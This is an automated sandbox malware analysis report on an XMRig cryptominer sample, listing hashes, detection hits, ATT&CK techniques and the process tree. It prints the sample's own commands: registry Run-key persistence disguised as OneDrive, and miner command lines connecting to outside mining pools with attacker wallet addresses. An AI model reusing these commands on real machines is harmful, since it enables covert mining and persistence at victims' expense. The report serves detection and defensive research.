xmrig | 5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce

Analysis

max time kernel
149s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25/12/2024, 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
Size

6.6MB
MD5

a4ac4ea53e40133a5295125f42b8f44b
SHA1

23515fa205d9552ff9be7c97e4779051e8d3efd6
SHA256

5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce
SHA512

a22a828f23b4add05183c3ae0f3f2fff76991e098b343a2cf34b02d70be72d8d89812ee348f6a0db642450ff29e831d1ff3ff59d427428f737a31bb98b8a874c
SSDEEP

196608:Qv4oFqOMRr29c9lNxQp2QzenyEUBiI+8WO82a3EXfyoo6Y8W/W:i4oFqth9vxQp20TV/8r3cfyos8

Score

10^/10

xmrig discovery miner persistence upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/2164-53-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/2164-54-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/2164-56-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/2164-59-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/2164-60-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/2164-58-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/2164-57-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
4308	OneDrive.exe

Loads dropped DLL 1 IoCs

pid	Process
4308	OneDrive.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"	REG.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ipinfo.io

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4260 set thread context of 1428	4260	JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe	84
PID 4308 set thread context of 632	4308	OneDrive.exe	92
PID 4308 set thread context of 2164	4308	OneDrive.exe	101

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/632-51-0x0000000140000000-0x0000000142B59000-memory.dmp	upx
behavioral2/memory/632-52-0x0000000140000000-0x0000000142B59000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	REG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	REG.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1072	REG.exe
32	REG.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1428	AppLaunch.exe
1428	AppLaunch.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe
4308	OneDrive.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2164	conhost.exe
Token: SeLockMemoryPrivilege	2164	conhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2164	conhost.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 4260 wrote to memory of 1428	4260	JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe	84
PID 4260 wrote to memory of 1428	4260	JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe	84
PID 4260 wrote to memory of 1428	4260	JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe	84
PID 4260 wrote to memory of 1428	4260	JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe	84
PID 4260 wrote to memory of 1428	4260	JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe	84
PID 1428 wrote to memory of 4308	1428	AppLaunch.exe	85
PID 1428 wrote to memory of 4308	1428	AppLaunch.exe	85
PID 1428 wrote to memory of 1072	1428	AppLaunch.exe	86
PID 1428 wrote to memory of 1072	1428	AppLaunch.exe	86
PID 1428 wrote to memory of 1072	1428	AppLaunch.exe	86
PID 1428 wrote to memory of 32	1428	AppLaunch.exe	87
PID 1428 wrote to memory of 32	1428	AppLaunch.exe	87
PID 1428 wrote to memory of 32	1428	AppLaunch.exe	87
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 632	4308	OneDrive.exe	92
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101
PID 4308 wrote to memory of 2164	4308	OneDrive.exe	101

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1428
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe --algo ETCHASH --pool etc.2miners.com:1010 --user 0xEB293f906Ae83111BC9c5163B0B2A9E0785a18B2.bebrik
      4⤵
      PID:632
  - - C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe -o xmr.2miners.com:2222 -u 43j4P4tGaaNW8u2amF6pBvd63GRGSMAi67r2qJ1u3PuqLv82r5cmrEThLk19WCQiUxAigJg9LTXhH2xcGiz9hboTBmVodn7 -p "bebrik"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2164
- - C:\Windows\SysWOW64\REG.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1072
- - C:\Windows\SysWOW64\REG.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:32

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\08s5oRQXAhuUIo_s

Filesize
215B

MD5
87afbf5a4ae61a49fa66e1eef6ba02ae

SHA1
e054d0178651f44e65f0481ee60c0fe551653798

SHA256
db79f16871eb8f25adbf86a9cdd738fb850626ce6b10de1f132cd9064d83b770

SHA512
1e6eb62455352ee2135e8974f140a7981598c71ad05df27559a737a44920749109a986bee08172078f0e5298fa22a60662ca6cdfa5d9a82b5abf435092515a95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Filesize
175KB

MD5
f3af73070387fb75b19286826cc3126c

SHA1
7774854137d7ada89f3b4bdf67631456a1e74853

SHA256
974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610

SHA512
a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Secur32.dll

Filesize
316KB

MD5
fed6517a5f84eecc29edee5586d7feeb

SHA1
56df244bf73c7ec7b59c98e1f5d47b379b58a06b

SHA256
5075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6

SHA512
45cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642

Download Submit
memory/632-52-0x0000000140000000-0x0000000142B59000-memory.dmp

Filesize
43.3MB

Download
memory/632-51-0x0000000140000000-0x0000000142B59000-memory.dmp

Filesize
43.3MB

Download
memory/1428-2-0x0000000000400000-0x00000000004CA000-memory.dmp

Filesize
808KB

Download
memory/1428-8-0x0000000000400000-0x00000000004CA000-memory.dmp

Filesize
808KB

Download
memory/2164-53-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/2164-54-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/2164-55-0x0000023A86D40000-0x0000023A86D60000-memory.dmp

Filesize
128KB

Download
memory/2164-56-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/2164-59-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/2164-60-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/2164-58-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/2164-57-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/4260-1-0x0000000001040000-0x0000000001140000-memory.dmp

Filesize
1024KB

Download